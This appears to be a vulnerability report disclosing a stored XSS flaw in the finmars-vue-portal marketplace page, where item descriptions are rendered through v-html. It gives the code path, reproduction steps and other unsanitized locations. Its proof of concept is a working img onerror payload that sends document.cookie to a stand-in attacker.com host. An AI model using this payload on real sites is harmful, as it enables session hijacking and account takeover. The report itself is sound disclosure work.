Stored XSS vulnerability in marketplace item descriptions

[Moltivie]

Summary

A critical stored XSS vulnerability exists in the marketplace feature that allows attackers to inject malicious JavaScript through marketplace item descriptions, which are rendered unsanitized using v-html.

Vulnerability Details

Location:

finmars-vue-portal/src/pages/marketplace/[id].vue

Line 36 in 496d349

<p class="marketplace-item-description" v-html="matchItem.description"></p>

Attack Vector

1. Data Source: Marketplace items are fetched from external API https://marketplace.finmars.com/api/v1/configuration/{id}/
2. Attacker Access: Anyone with marketplace publisher credentials can inject malicious content
3. Publishing Method: Configurations are pushed via pushConfigurationToMarketplace.put endpoint with username/password authentication
4. Execution: Malicious JavaScript executes when any user views the marketplace item

Impact

• Stored XSS affecting all users who view the compromised marketplace item
• Session hijacking - Authentication tokens (access_token, refresh_token, id_token) are accessible via JavaScript (cookies lack httpOnly flag)
• Account takeover - Attacker can perform actions on behalf of victims
• Data exfiltration - Sensitive user data can be stolen
• Phishing - Users can be redirected to malicious sites or shown fake login forms

Proof of Concept

An attacker publishes a marketplace configuration with this description:

Great financial tool!<img src=x onerror="fetch('https://attacker.com/steal',{method:'POST',body:document.cookie})">

When victims browse to /marketplace/{id}, the payload executes and sends their authentication tokens to the attacker.

Reproduction Steps

1. Create marketplace publisher account on marketplace.finmars.com
2. Push a configuration with malicious HTML in the description field
3. Navigate to the marketplace item page as a different user
4. Observe JavaScript execution in browser console

Affected Code Path

marketplace.finmars.com API
  ↓
useApi('marketplaceItem.get') [line 251]
  ↓
item.value (no sanitization)
  ↓
matchItem computed property [line 239]
  ↓
v-html="matchItem.description" [line 36]
  ↓
XSS EXECUTION

Additional Vulnerable Locations

Similar unsanitized v-html usage found in:

• src/components/modal/DownloadFile.vue:22,30 (CSV file preview)
• src/components/common/FilePreview.vue:37 (File content preview)
• src/components/Fm/UnifiedDataSelect/helper.js:8 (Search highlighting)
• src/stores/useWhiteLabelStore.js:57,61 (Custom CSS injection)

These should be reviewed as part of a comprehensive XSS remediation effort.

Questions

• Is this behavior intentional? Is there any backend sanitization or validation on the marketplace API that prevents malicious HTML?
• Are there any access controls or review processes for marketplace publishers that would prevent malicious content?
• Should HTML formatting be allowed in marketplace descriptions, or should it sanitize/escape all user-provided content?